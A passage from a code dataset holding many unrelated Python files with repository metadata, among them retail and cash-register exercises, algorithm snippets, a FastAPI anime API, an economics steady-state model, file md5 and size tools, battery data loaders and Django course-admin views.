TEST THE PROGRAM*********\r\n#==============================================\r\n\r\nimport retail\r\nimport cash_register\r\n\r\n# constants to hold the options of purchase items\r\nITEM1 = 1\r\nITEM2 = 2\r\nITEM3 = 3\r\nITEM4 = 4\r\nITEM5 = 5\r\n\r\ndef main():\r\n#create sale items\r\n Item1 = retail.RetailItem(\"Item1\", 10, (19.99 - (19.99 *.1) )) #10 percent discount\r\n Item2 = retail.RetailItem(\"Item2\", 15, 12.50) # not discount\r\n Item3 = retail.RetailItem(\"Item3\", 3, 79.00 - (79.00 * 0.15 )) #15% discount\r\n Item4 = retail.RetailItem(\"Item4\", 50, 1.00) #not discount\r\n Item5 = retail.RetailItem(\"Item5\", 5, 49.99 - (49.99 * 0.1)) #10% disccount\r\n\r\n# create dictionary of sale items\r\n sale_items = {ITEM1:Item1, ITEM2:Item2, ITEM3:Item3, ITEM4:Item4, ITEM5:Item5}\r\n\r\n# create a cash register\r\n register = cash_register.CashRegister()\r\n\r\n# initialize loop test\r\n checkout = 'N'\r\n\r\n# user wants to purchase more items\r\n while checkout=='N':\r\n user_choice = get_user_choice()\r\n item = sale_items[user_choice]\r\n if item.get_inventory() == 0:\r\n print(\"The item is out of stock.\")\r\n else:\r\n register.purchase_item(item)\r\n# update item\r\n new_item = retail.RetailItem(item.get_description(), item.get_inventory()-1,\\\r\n item.get_price())\r\n\r\n sale_items[user_choice] = new_item\r\n checkout = input(\"Are you ready to check out (Y/N)? \")\r\n print()\r\n print(\"Your purchase total is: \", format(register.get_total(), '.2f'))\r\n print()\r\n register.show_items()\r\n register.clear()\r\n\r\ndef get_user_choice():\r\n print(\"Menu\")\r\n print(\"---------------------------------\")\r\n print(\"1. Item1\")\r\n print(\"2. Item2\")\r\n print(\"3. Item3\")\r\n print(\"4. Item4\")\r\n print(\"5. Item5\")\r\n print()\r\n \r\n choice = int(input(\"Enter the menu number of the item \" +\\\r\n \"you would like to purchase: \"))\r\n print()\r\n while choice > ITEM5 or choice < ITEM1:\r\n choice = int(input(\"Please enter a valid item number: \"))\r\n print()\r\n return choice\r\nmain()\r\n\r\n","repo_name":"feliusps/Python","sub_path":"python programming Austral University-Coursera/Object Oriente Programming in Python/week 4 inittest testing TDD OOP/caja_registradora.py","file_name":"caja_registradora.py","file_ext":"py","file_size_in_byte":8060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38127442219","text":"import time\nimport random\n\ndef log_time(function):\n def wrapper(*args):\n t0=time.time()\n function(*args)\n t=time.time()-t0\n print(function.__name__ + \": \" + str(t))\n return wrapper\n\n@log_time\ndef random_sort(n):\n return sorted([random.random() for i in range(n)])\n\n@log_time\ndef count(start,stop):\n i=start\n while i n:\n high = mid - 1\n elif lst[mid] < n:\n low = mid + 1\n else:\n return mid\n return -1\n","repo_name":"luoyan988/problem","sub_path":"ebook/code/python/chapter25.py","file_name":"chapter25.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4315441490","text":"# ~ Computational Geometry - (2020) ~\n# \n# * Topic: Given two points inside a polygon, the goal is to find \n# the shortest path lying inside the polygon between the \n# two points. *\n# \n# * Author's Name : Ioannis Marios Papagiannakos\n# \n\nimport os\n\nfrom project_libs import findShortestPathInPolygon, point\n\n# Main \n\nprojectDir = os.path.dirname(__file__)\ninputDataDir = os.path.join('Data','in')\noutputDataDir = os.path.join('Data', 'out')\noutputFileName = ['LayerOfInterest.shp', 'MonotonizedLayer.shp', 'TriangulatedLayer.shp', 'Path.shp', 'ShortestPath.shp']\n\n# Open first shapefile\ninputFileName = os.path.join('GSHHS_shp', 'c', 'GSHHS_c_L1.shp')\n# takes time...!\n# inputFileName = os.path.join('GSHHS_shp', 'f', 'GSHHS_f_L1.shp')\ninputFileName = os.path.join(projectDir, inputDataDir, inputFileName)\n\n# Shapefile format\ndriverName = \"ESRI Shapefile\"\n\n# Input Format\n# point1 = point(, )\n\n# Madagascar\ninput_starting_point = point(49.162, -12.424)\ninput_ending_point = point(44.706, -16.295)\n\n# # Indonesia\n# input_starting_point = point(119.978, -5.539)\n# input_ending_point = point(124.534, 1.002)\n\n# # Nunavut (Canada)\n# input_starting_point = point(-77.10, 65.16)\n# input_ending_point = point(-87.999, 70.381)\n\nfindShortestPathInPolygon(input_starting_point, input_ending_point,\n inputFileName, outputFileName, driverName, outputDataDir)\n\n","repo_name":"JohnPapagiannakos/shortestpathsinpolygons","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42231190553","text":"\"\"\"A nelpy session is roughly equivalent to a NEO segment.\nIt has a common clock.\n\nThis object is very much a work-in-progress!!!\"\"\"\n\n__all__ = ['Session']\n\nimport copy\nimport warnings\n\n# Force warnings.warn() to omit the source code line in the message\nformatwarning_orig = warnings.formatwarning\nwarnings.formatwarning = lambda message, category, filename, lineno, \\\n line=None: formatwarning_orig(\n message, category, filename, lineno, line='')\n\n########################################################################\n# class Session\n########################################################################\nclass Session:\n \"\"\"Nelpy session with common clock.\"\"\"\n\n __attributes__ = [\"_animal\", \"_label\", \"_st\", \"_extern\", \"_mua\"]\n\n def __init__(self, animal=None, st=None, extern=None, mua=None, label=None, empty=False):\n\n # if an empty object is requested, return it:\n if empty:\n for attr in self.__attributes__:\n exec(\"self.\" + attr + \" = None\")\n return\n\n self._animal = animal\n self._extern = extern\n self._st = st\n self._mua = mua\n self.label = label\n\n @property\n def animal(self):\n return self._animal\n\n @property\n def extern(self):\n return self._extern\n\n @property\n def st(self):\n return self._st\n\n @property\n def mua(self):\n return self._mua\n\n @property\n def label(self):\n \"\"\"Label pertaining to the source of the spike train.\"\"\"\n if self._label is None:\n warnings.warn(\"label has not yet been specified\")\n return self._label\n\n @label.setter\n def label(self, val):\n if val is not None:\n try: # cast to str:\n label = str(val)\n except TypeError:\n raise TypeError(\"cannot convert label to string\")\n else:\n label = val\n self._label = label\n\n#----------------------------------------------------------------------#\n#======================================================================#","repo_name":"nelpy/nelpy","sub_path":"nelpy/auxiliary/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"41359845688","text":"from util import http, hook\n\n@hook.command(autohelp=False)\ndef bitcoin(inp, say=None):\n \".bitcoin -- gets current exchange rate for bitcoins from mtgox\"\n data = http.get_json(\"https://data.mtgox.com//api//2//BTCUSD//money//ticker\")\n ticker = data['data']\n t = {\n 'low': float(ticker['low']['value']),\n 'high': float(ticker['high']['value']),\n 'avg': float(ticker['last']['value']),\n 'vol': float(ticker['vol']['value'])\n }\n say(\"Current: \\x0307$%(avg).2f\\x0f - High: \\x0307$%(high).2f\\x0f\"\n \" - Low: \\x0307$%(low).2f\\x0f - Volume: %(vol)s\" % t)\n","repo_name":"hitzler/homero","sub_path":"plugins/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"12275751300","text":"\"\"\"\nDesign and implement a data structure for a compressed string iterator.\nIt should support the following operations: next and hasNext.\n\nThe given compressed string will be in the form of each letter followed by\na positive integer representing the number of this letter existing in the original uncompressed string.\n\nnext() - if the original string still has uncompressed characters, return the next letter;\n Otherwise return a white space.\nhasNext() - Judge whether there is any letter needs to be uncompressed.\n\nExample:\n\nStringIterator iterator = new StringIterator(\"L1e2t1C1o1d1e1\");\n\niterator.next(); // return 'L'\niterator.next(); // return 'e'\niterator.next(); // return 'e'\niterator.next(); // return 't'\niterator.next(); // return 'C'\niterator.next(); // return 'o'\niterator.next(); // return 'd'\niterator.hasNext(); // return true\niterator.next(); // return 'e'\niterator.hasNext(); // return false\niterator.next(); // return ' '\n\"\"\"\nclass StringIterator:\n\n def __init__(self, compressedString):\n \"\"\"\n :type compressedString: str\n \"\"\"\n self.s = compressedString\n self.idx = 0\n self.c = \"\"\n self.count = 0\n self.hasNext()\n\n def next(self):\n \"\"\"\n :rtype: str\n \"\"\"\n #print(self.c, self.count)\n if self.count==0:\n if not self.hasNext():\n return \" \"\n self.count -= 1\n return self.c\n\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n if self.count>0:\n return True\n if self.idx>=len(self.s):\n self.count = 0\n return False\n self.c = self.s[self.idx]\n self.idx += 1\n start = self.idx\n while self.idx0\n\n# Your StringIterator object will be instantiated and called as such:\n# obj = StringIterator(compressedString)\n# param_1 = obj.next()\n# param_2 = obj.hasNext()\n","repo_name":"ellinx/LC-python","sub_path":"DesignCompressedStringIterator.py","file_name":"DesignCompressedStringIterator.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20167086946","text":"import uvicorn\r\nfrom gogoanime import *\r\nfrom fastapi import FastAPI\r\nimport json\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\n\r\n\r\napp = FastAPI()\r\n\r\norigins = [\"*\"]\r\n\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=origins,\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\n\r\n\r\n@app.get('/api/recently/{page}')\r\nasync def recently(page: int):\r\n recently = GogoanimeParser.get_recently_uploaded(page=page)\r\n return json.loads(recently)\r\n\r\n@app.get('/api/latest/{page}')\r\nasync def latest(page: int):\r\n latest = GogoanimeParser.latest(page=page)\r\n return json.loads(latest)\r\n\r\n\r\n@app.get('/api/popular/{page}')\r\nasync def popular(page: int):\r\n popular = GogoanimeParser.popular(page=page)\r\n return json.loads(popular)\r\n\r\n@app.get('/api/new-season/{page}')\r\nasync def newseason(page: int):\r\n newseason = GogoanimeParser.newSeason(page=page)\r\n return json.loads(newseason)\r\n\r\n@app.get('/api/movies/{page}')\r\nasync def movies(page: int):\r\n movies = GogoanimeParser.movies(page=page)\r\n return json.loads(movies)\r\n\r\n@app.get('/api/search/{key}/{page}')\r\nasync def search(key: str ,page: int):\r\n search = GogoanimeParser.search(key=key,page=page)\r\n return search\r\n\r\n\r\n@app.get('/api/category/{genre}/{page}')\r\nasync def genre(genre: str, page: int):\r\n genre = GogoanimeParser.genre(genre_name=genre, page=page)\r\n return genre\r\n\r\n\r\n@app.get('/api/details/{animeid}')\r\nasync def details(animeid: str):\r\n detail = GogoanimeParser.details(animeid=animeid)\r\n return detail\r\n\r\n@app.get('/api/schedule/{animeid}')\r\nasync def details(animeid: str):\r\n schedule = GogoanimeParser.schedule(animeid=animeid)\r\n return schedule\r\n\r\n\r\n@app.get('/api/{animeid}/episode/{episode_num}')\r\nasync def episode(animeid: str, episode_num: int):\r\n episode = GogoanimeParser.episode(animeid=animeid, episode_num=episode_num)\r\n return episode\r\n\r\n\r\n@app.get(\"/\")\r\ndef main():\r\n return {\r\n \"message\": \"Hello my friend\"\r\n }\r\n \r\nif __name__ == \"__main__\":\r\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\r\n","repo_name":"ottoh3x/ottogo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9879450880","text":"import math\r\na = 2\r\nb = math.sqrt(2)\r\nc = 0\r\nwhile c!=1:\r\n c= 2/b\r\n a= a*c\r\n b= math.sqrt(2+b)\r\n \r\nprint(\"Approximation of pi:\",round(a,3))\r\nr=eval(input(\"Enter the radius:\\n\"))\r\nArea= round(a*r**2, 3)\r\nprint(\"Area:\",Area)\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/gwxyon001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33025803354","text":"import yaml\n\ndef load_yaml_from_file(path):\n with open(path, 'r') as stream:\n data = yaml.safe_load(stream)\n return data\n\ndef multiline_equal(s1, s2):\n s1.strip()\n s2.strip()\n s1_array = s1.splitlines()\n s2_array = s2.splitlines()\n if len(s1_array) != len(s2_array):\n return False\n for i in range(len(s1_array)):\n if s1_array[i].strip() != s2_array[i].strip():\n return False\n return True","repo_name":"diogenes0803/simple-server-configuration","sub_path":"commons/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25524445215","text":"#!/usr/bin/env python3\nimport os\nfrom pathlib import Path\nimport sys\n\n__projectdir__ = Path(os.path.dirname(os.path.realpath(__file__)) + '/')\n\nimport numpy as np\n\n# Get Steady State:{{{1\ndef getss(BETA, LAMBDAs, Pistar, SIGMA, TAU, WEIGHTs):\n \"\"\"\n Compute the steady state for a multiple sector model.\n\n SIGMA = elasticity of substitution within sectors, TAU = across sectors\n \"\"\"\n\n J = len(WEIGHTs)\n\n # verify WEIGHTs sum to 1\n if np.abs(np.sum(WEIGHTs) - 1) > 1e-6:\n raise ValueError('WEIGHTs must sum to 1.')\n\n # compute PjstaroverPj\n PjstaroverPj_list = []\n for j in range(J):\n PjstaroverPj_list.append( ( (1-(1-LAMBDAs[j])*Pistar**(SIGMA-1)) / LAMBDAs[j])**(1/(1-SIGMA)) )\n\n PstaroverP = ((1 - (1 - LAMBDAs[j]) * Pistar**(SIGMA - 1))/LAMBDAs[j])**(1/(1 - SIGMA))\n\n # compute nu_j\n NUj_list = []\n for j in range(J):\n NUj_list.append( 1/(1 - (1-LAMBDAs[j])*Pistar**SIGMA) * LAMBDAs[j] * PjstaroverPj_list[j]**(-SIGMA) )\n\n # compute MC\n # first compute the sum of the integral term to (1 - TAU)\n sumterm = 0\n terminfoc_list = []\n for j in range(J):\n terminfoc_part1 = SIGMA / (SIGMA - 1) * (1 - (1-LAMBDAs[j])*BETA*Pistar**(SIGMA-1)) / ( 1 - (1-LAMBDAs[j]) * BETA * Pistar**SIGMA )\n terminfoc_part2 = 1 / PjstaroverPj_list[j] \n terminfoc = terminfoc_part1 * terminfoc_part2\n terminfoc_list.append(terminfoc)\n if terminfoc < 0:\n raise ValueError('Solving for MC failed in Calvo multisector. terminfoc < 0.')\n\n sumterm = sumterm + WEIGHTs[j] * (terminfoc_list[j]) ** (1 - TAU)\n if sumterm <= 0:\n raise ValueError('Solving for MC failed in Calvo multisector. sumterm < 0')\n MC = (1/sumterm)**(1/(1-TAU))\n\n # PjoverP_list\n PjoverP_list = []\n for j in range(J):\n PjoverP_list.append( terminfoc_list[j] * MC )\n\n # NU\n NU = 0\n for j in range(J):\n NU = NU + WEIGHTs[j] * PjoverP_list[j] ** (-TAU) * NUj_list[j]\n\n retdict = {}\n retdict['NUj_list'] = NUj_list\n retdict['PjstaroverPj_list'] = PjstaroverPj_list\n retdict['MC'] = MC\n retdict['PjoverP_list'] = PjoverP_list\n retdict['NU'] = NU\n\n if np.any([NU_j < 0 for NU_j in retdict['NUj_list']]):\n raise ValueError('NU_j take negative values.')\n\n return(retdict)\n\n\ndef test():\n LAMBDAs = [1 - (1 - 0.6) ** (1/4)]\n # LAMBDAs = [1 - (1 - 0.6) ** (1/4), 0.9]\n\n WEIGHTs = [1]\n\n retdict = getss(BETA = 0.94 ** (1/4), LAMBDAs = LAMBDAs, Pistar = 1.04 ** (1/4), SIGMA = 8, TAU = 1.001, WEIGHTs = WEIGHTs)\n print(retdict['MC'])\n print(retdict['PjoverP_list'])\n print(retdict['NUj_list'])\n print(retdict['NU'] * retdict['MC'])\n\n\ndef test2():\n LAMBDAs = [1 - (1 - 0.6) ** (1/4)] * 2\n # LAMBDAs = [1 - (1 - 0.6) ** (1/4), 0.9]\n\n WEIGHTs = [0.5, 0.5]\n\n retdict = getss(BETA = 0.94 ** (1/4), LAMBDAs = LAMBDAs, Pistar = 1.04 ** (1/4), SIGMA = 8, TAU = 1.001, WEIGHTs = WEIGHTs)\n print(retdict['MC'])\n print(retdict['PjoverP_list'])\n print(retdict['NUj_list'])\n print(retdict['NU'] * retdict['MC'])\n\n\n# Pricing Parameters Based upon Nakamura Steinsson 2008:{{{1\ndef ns_vectors(numsectors = 14):\n \"\"\"\n Vectors for weights and lambdas from \n \"\"\"\n if numsectors == 6:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 19.1, 5.9, 13.7, 38.5, 15.1])\n ns_monthlyfreqs = np.array([91.6, 35.5, 25.4, 11.9, 8.8, 5.2])\n elif numsectors == 9:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 19.1, 5.9, 9.2, 13.7, 9.6, 10.0, 15.1, 9.7])\n ns_monthlyfreqs = np.array([91.6, 35.5, 25.4, 19.7, 11.9, 7.6, 5.5, 5.2, 3.2])\n elif numsectors == 11:\n # weights from Table 2, p.1433 of Nakamura Steinsson's Five Facts About Prices, 2008\n ns_weights = np.array([8.2, 5.9, 5.0, 6.5, 8.3, 3.6, 5.4, 5.3, 5.1, 5.5, 38.5])\n ns_monthlyfreqs = np.array([10.5, 25.0, 6.0, 3.6, 31.3, 6.0, 15.0, 38.1, 87.6, 41.7, 6.1])\n elif numsectors == 14:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 5.3, 5.5, 5.9, 8.3, 7.7, 13.7, 7.5, 5.0, 7.8, 3.6, 7.6, 6.5, 7.9])\n ns_monthlyfreqs = np.array([91.6, 49.4, 43.7, 25.4, 21.3, 21.7, 11.9, 8.4, 6.5, 6.2, 6.1, 4.9, 3.6, 2.9])\n else:\n raise ValueError('Incorrect option for sectors.')\n\n # adjustments\n ns_weights = ns_weights / np.sum(ns_weights)\n ns_monthlyfreqs = ns_monthlyfreqs / 100\n\n return(ns_weights, ns_monthlyfreqs)\n\n\ndef getns_lambdas(monthsinperiod = 3, numsectors = 14):\n ns_weights, ns_monthlyfreqs = ns_vectors(numsectors = numsectors)\n ns_lambdas = 1 - (1 - ns_monthlyfreqs) ** monthsinperiod\n return(ns_weights, ns_lambdas)\n\n\ndef ns_ss(BETA, Pistar, SIGMA, TAU, monthsinperiod = 1):\n \"\"\"\n Frequencies of price changes and weights taken from Nakamura Steinsson\n \"\"\"\n ns_weights, ns_lambdas = getns_lambdas(monthsinperiod = monthsinperiod)\n\n retdict = getss(BETA, ns_lambdas, Pistar, SIGMA, TAU, ns_weights)\n\n return(retdict)\n","repo_name":"c-d-cotton/calvo-multisector-ss","sub_path":"manysector_ss_func.py","file_name":"manysector_ss_func.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11250624579","text":"from uuid import uuid4\nfrom hashlib import sha256\n\nurl_dict = {}\nsalt = uuid4().hex\n\n\ndef cash():\n url = input('Введите url: ')\n if url == 'stop':\n return url_dict\n\n hash_url = sha256(url.encode() + salt.encode()).hexdigest()\n\n if hash_url in url_dict.values():\n print('Такая ссылка уже введена')\n return cash()\n else:\n url_dict[url] = hash_url\n return cash()\n\n\nprint(cash())\n","repo_name":"Crasow/For_practical","sub_path":"Python_algorithms/OLD/Lesson_3/HW_4.py","file_name":"HW_4.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27038917989","text":"import numpy as np\r\nimport pandas as pd\r\nimport torch\r\nfrom torch.utils.data import TensorDataset,DataLoader\r\nfrom Config import get_args\r\nimport os\r\nfrom utils import Scaler\r\n\r\n\r\ndef load_data(args):\r\n\r\n source_X_files = os.listdir(os.path.join(args.source_dir,'X'))\r\n source_Y_files = os.listdir(os.path.join(args.source_dir, 'Y'))\r\n\r\n target_X_files = os.listdir(os.path.join(args.target_dir,'X'))\r\n target_Y_files = os.listdir(os.path.join(args.target_dir,'Y'))\r\n\r\n # print(source_X_files)\r\n # print(source_Y_files)\r\n # print(target_X_files)\r\n # print(target_Y_files)\r\n\r\n ############################\r\n ####### load source data\r\n ############################\r\n Xs_list = []\r\n Ys_list = []\r\n for x in source_X_files:\r\n for y in source_Y_files:\r\n if x.split('_')[2] == y.split('_')[2]:\r\n battery_i_data = np.load(os.path.join(args.source_dir,'X',x))\r\n battery_i_capacity = np.load(os.path.join(args.source_dir,'Y',y))\r\n Xs_list.append(battery_i_data)\r\n Ys_list.append(battery_i_capacity)\r\n break\r\n source_X = np.concatenate(Xs_list,axis=0)\r\n source_Y = np.concatenate(Ys_list,axis=0)\r\n print(f'source: {source_X.shape}, {source_Y.shape}')\r\n\r\n ############################\r\n ####### load target data\r\n ############################\r\n count = 0\r\n Xt_list = []\r\n Yt_list = []\r\n for x in target_X_files:\r\n count += 1\r\n for y in target_Y_files:\r\n if x.split('_')[2] == y.split('_')[2]:\r\n if count == args.test_battery_id:\r\n target_test_X = np.load(os.path.join(args.target_dir,'X',x))\r\n target_test_Y = np.load(os.path.join(args.target_dir, 'Y', y))\r\n print(f'target test battery: {x}')\r\n continue\r\n\r\n battery_i_data = np.load(os.path.join(args.target_dir,'X',x))\r\n battery_i_capacity = np.load(os.path.join(args.target_dir,'Y',y))\r\n Xt_list.append(battery_i_data)\r\n Yt_list.append(battery_i_capacity)\r\n break\r\n target_train_X = np.concatenate(Xt_list,axis=0)\r\n target_train_Y = np.concatenate(Yt_list,axis=0)\r\n print(f'target train: {target_train_X.shape}, {target_train_Y.shape}')\r\n print(f'target test: {target_test_X.shape}, {target_test_Y.shape}')\r\n\r\n #######################\r\n ###### normalization\r\n #######################\r\n target_train_x, target_test_x = Scaler(target_train_X, target_test_X).minmax()\r\n target_train_y, target_test_y = Scaler(target_train_Y, target_test_Y).minmax()\r\n source_x = Scaler(source_X).minmax()\r\n source_y = Scaler(source_Y).minmax()\r\n\r\n target_train_x = torch.from_numpy(np.transpose(target_train_x, (0, 2, 1)))\r\n target_train_y = torch.from_numpy(target_train_y).view(-1, 1)\r\n target_test_x = torch.from_numpy(np.transpose(target_test_x, (0, 2, 1)))\r\n target_test_y = torch.from_numpy(target_test_y).view(-1, 1)\r\n source_x = torch.from_numpy(np.transpose(source_x, (0, 2, 1)))\r\n source_y = torch.from_numpy(source_y).view(-1, 1)\r\n\r\n\r\n\r\n source_loader = DataLoader(TensorDataset(source_x, source_y), batch_size=args.batch_size, shuffle=True,drop_last=True)\r\n target_train_loader = DataLoader(TensorDataset(target_train_x, target_train_y), batch_size=args.batch_size,shuffle=True,drop_last=True)\r\n target_valid_loader = DataLoader(TensorDataset(target_train_x, target_train_y), batch_size=args.batch_size,shuffle=False,drop_last=False)\r\n target_test_loader = DataLoader(TensorDataset(target_test_x, target_test_y), batch_size=args.batch_size,shuffle=False)\r\n return source_loader, target_train_loader, target_valid_loader,target_test_loader\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n source_loader, target_train_loader, target_valid_loader,target_test_loader = load_data(args)\r\n print(len(source_loader))\r\n print(len(target_train_loader))\r\n print(len(target_valid_loader))\r\n print(len(target_test_loader))","repo_name":"wang-fujin/HATL","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"28879383711","text":"# -*- coding: utf-8 -*-\r\n# @Author: ChenJun\r\n# @Email: chenjun4663@novogene.com\r\n# @Qmail: 1170101471@qq.com\r\n# @Date: 2018-12-27 13:50:49\r\n# @Last Modified by: JUN\r\n# @Last Modified time: 2018-12-28 00:16:06\r\n\r\nimport os\r\nimport time\r\nfrom multiprocessing import Pool\r\nimport argparse\r\n# import sys\r\n# import hashlib\r\n# import datetime\r\n\r\n\r\ndef fargv():\r\n parser = argparse.ArgumentParser(\r\n description='用于获取当前文件夹下所有的md5值和大小信息,并输出到新文件')\r\n parser.add_argument('-x', type=int, default=1,\r\n help='md5计算的进程数, 默认1')\r\n parser.add_argument('-c', '--checksize', action='store_true',\r\n help='是否只开启 checksize 模式')\r\n args = parser.parse_args()\r\n return args.__dict__\r\n\r\n\r\ndef md5_do(filepath):\r\n os.system('md5sum \"%s\" >>md5.txt' % filepath)\r\n\r\n\r\ndef do(x, checksize=False):\r\n t00 = time.time()\r\n\r\n print('> \\n正在获取当前文件夹所有文件路径...')\r\n t0 = time.time()\r\n # s_files = os.popen(\"\"\"find -L ./ -type f |cat|awk '!/.\\/md5.txt/'|sort\"\"\").read()\r\n s_files = os.popen(\r\n \"\"\"find -L ./ -type f|cat|awk '!/.\\/md5.txt/'|awk '!/.\\/checkSize.xls/'\"\"\").read()\r\n Lfiles = s_files.strip().split('\\n')\r\n print('获取结束,耗时%s秒' % (time.time() - t0))\r\n\r\n print('> \\n正在获取文件夹大小...')\r\n t0 = time.time()\r\n with open('checkSize.xls', 'w') as fo:\r\n # fo.write(\r\n # '\\t'.join([str(os.path.getsize('./md5.txt')), './md5.txt']) + '\\n')\r\n for path in Lfiles:\r\n fo.write('\\t'.join([str(os.path.getsize(path)), path]) + '\\n')\r\n print('获取结束,耗时%s秒' % (time.time() - t0))\r\n os.system('sort -k2 checkSize.xls -o checkSize.xls')\r\n print('排序结束,耗时%s秒' % (time.time() - t0))\r\n print('运行结束,已于当前文件夹写入 checkSize.xls ,耗时%s秒' % (time.time() - t00))\r\n\r\n if not checksize:\r\n print('> \\n正在以 %s 进程 计算所有文件的md5值...' % x)\r\n os.system('>md5.txt')\r\n t0 = time.time()\r\n p = Pool(x)\r\n for path in Lfiles:\r\n # md5_do(path)\r\n p.apply_async(md5_do, args=(path,))\r\n p.close()\r\n p.join()\r\n print('计算结束,耗时%s秒' % (time.time() - t0))\r\n\r\n print('> \\n正在对md5.txt、checkSize.xls进行排序...')\r\n t0 = time.time()\r\n os.system('sort -k2 md5.txt -o md5.txt')\r\n print('排序结束,耗时%s秒' % (time.time() - t0))\r\n print('运行结束,已于当前文件夹写入 md5.txt ,耗时%s秒' % (time.time() - t00))\r\n\r\n\r\ndef main():\r\n kwargs = fargv()\r\n # print(kwargs)\r\n # print(*list(kwargs.keys()),sep=\", \")\r\n do(**kwargs)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n# def GetFileMd5(filename):\r\n# pass\r\n # Linux下运算时间大约长到1.2倍,该函数被遗弃\r\n # if not os.path.isfile(filename):\r\n # return\r\n # myhash = hashlib.md5()\r\n # f = open(filename, 'rb')\r\n # while True:\r\n # # b = f.read(8096)\r\n # b = f.read(40960)\r\n # if not b:\r\n # break\r\n # myhash.update(b)\r\n # f.close()\r\n # return myhash.hexdigest()\r\n","repo_name":"wan230114/mytools","sub_path":"tools_jiqun/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5421682471","text":"import ConfigParser\nimport os\n\nfrom ovd import Config as ConfigModule\n\nclass ConfigReader:\n\t@classmethod\n\tdef process(cls, filename = None):\n\t\traise NotImplementedError()\n\t\n\t\n\t@classmethod\n\tdef read_ini(cls, filename):\n\t\tif not os.path.isfile(filename):\n\t\t\tConfigModule.report_error(\"No such file '%s'\"%(filename))\n\t\t\treturn False\n\t\t\n\t\tparser = ConfigParser.ConfigParser()\n\t\tparser.read(filename)\n\t\t\n\t\tdata = {}\n\t\t\n\t\tfor section in parser.sections():\n\t\t\tdata[section] = {}\n\t\t\tfor k,v in parser.items(section):\n\t\t\t\tdata[section][k] = v\n\t\t\n\t\treturn data\n","repo_name":"ulteo/ovd","sub_path":"OvdServer/ovd/Platform/ConfigReader.py","file_name":"ConfigReader.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"4802699960","text":"from django.shortcuts import render\nfrom .models import Course, UserCourse, UserCentre\nfrom btbadmin.models import Centre\nfrom django.http import HttpResponseRedirect\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom pullingapp import settings\nfrom send_email.views import send_email\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.sites.shortcuts import get_current_site\n\n\n@login_required(login_url=settings.LOGIN_URL)\n@user_passes_test(lambda u: u.groups.filter(name='domain_admins').exists())\ndef domain_admin_home(request):\n current_user = request.user\n current_user_id = current_user.id\n user_centre = UserCentre.objects.get(user_id=current_user_id)\n\n delete_course = request.POST.get('delete_course')\n if delete_course:\n course = Course.objects.get(id=delete_course)\n course.delete()\n return HttpResponseRedirect(reverse('domain_admin_home'))\n\n add_new_course = request.POST.get('add_new_course')\n if add_new_course == \"new_course\":\n course_code = request.POST.get('course_code')\n course_title = request.POST.get('course_title')\n course_start_date = request.POST.get('course_start_date')\n course = Course(code=course_code, title=course_title, start_date=course_start_date, status=0, centre_id=user_centre.centre_id, created_date=timezone.now, updated_date=timezone.now)\n course.save()\n return HttpResponseRedirect(reverse('domain_admin_home'))\n\n courses = Course.objects.filter(centre_id=user_centre.centre_id)\n return render(\n request,\n 'domain_admin/domain_admin.html',\n {\n 'title': 'Edit course',\n 'courses': courses,\n }\n )\n\n\n@login_required(login_url=settings.LOGIN_URL)\n@user_passes_test(lambda u: u.groups.filter(name='domain_admins').exists())\ndef edit_course(request, course_id):\n message = \"\"\n message_class = \"\"\n course_message = \"\"\n\n update_course = request.POST.get('update_course')\n course_title = request.POST.get('course_title')\n course_status = request.POST.get('course_status')\n if update_course:\n course 